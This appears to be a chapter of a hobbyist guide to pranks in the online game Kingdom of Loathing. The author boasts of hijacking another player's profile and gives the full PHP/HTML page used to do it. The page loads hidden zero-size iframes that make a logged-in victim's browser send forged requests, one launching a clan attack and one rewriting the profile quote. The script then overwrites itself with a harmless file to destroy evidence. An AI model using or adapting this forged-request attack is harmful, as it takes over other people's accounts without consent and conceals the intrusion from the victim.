Author: Boozerbear
Chapter Fourteen
(remote Profile Hacking)
I wrote up this hack at the request of the victim himself. I don't even remember who it was, but they were raking poor Phoenix over the coals for something, so I told him to lay off or I'd hack him. Of course he got all snooty and dared me to do just exactly that. and I did do just exactly that. Stupidly he clicked on the link I sent him and got PWNT! After being run once, the script copies something innocent over itself so that if the victim came back to see what had happened, he would get no clues as to what had just happened to him.
<html>
<head>
<title>KOL Trick #16</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta content="2; URL=http://www.kingdomofloathing.com" http-equiv="REFRESH">
</head>
<body>
<b>KOL Trick #16</b>
<br>
<br>
<?php
$thisdir = "/home/www/munk";
print <<<EOF
<font color=red>
ERROR, victim must be logged in and must click link within KOL for trick to
work!<br>
</font>
<iframe src="http://www.kingdomofloathing.com/clan_attack.php?whichclan=953"
width="0" height="0">
</iframe>
<iframe src="http://www.kingdomofloathing.com/account_profile.php?action=updating"e=Phoenix%20PWND%20ME!"
width="0" height="0">
</iframe>
</body>
</html>
EOF;
copy ("$thisdir/weasels.php", "$thisdir/kol16.php");
?>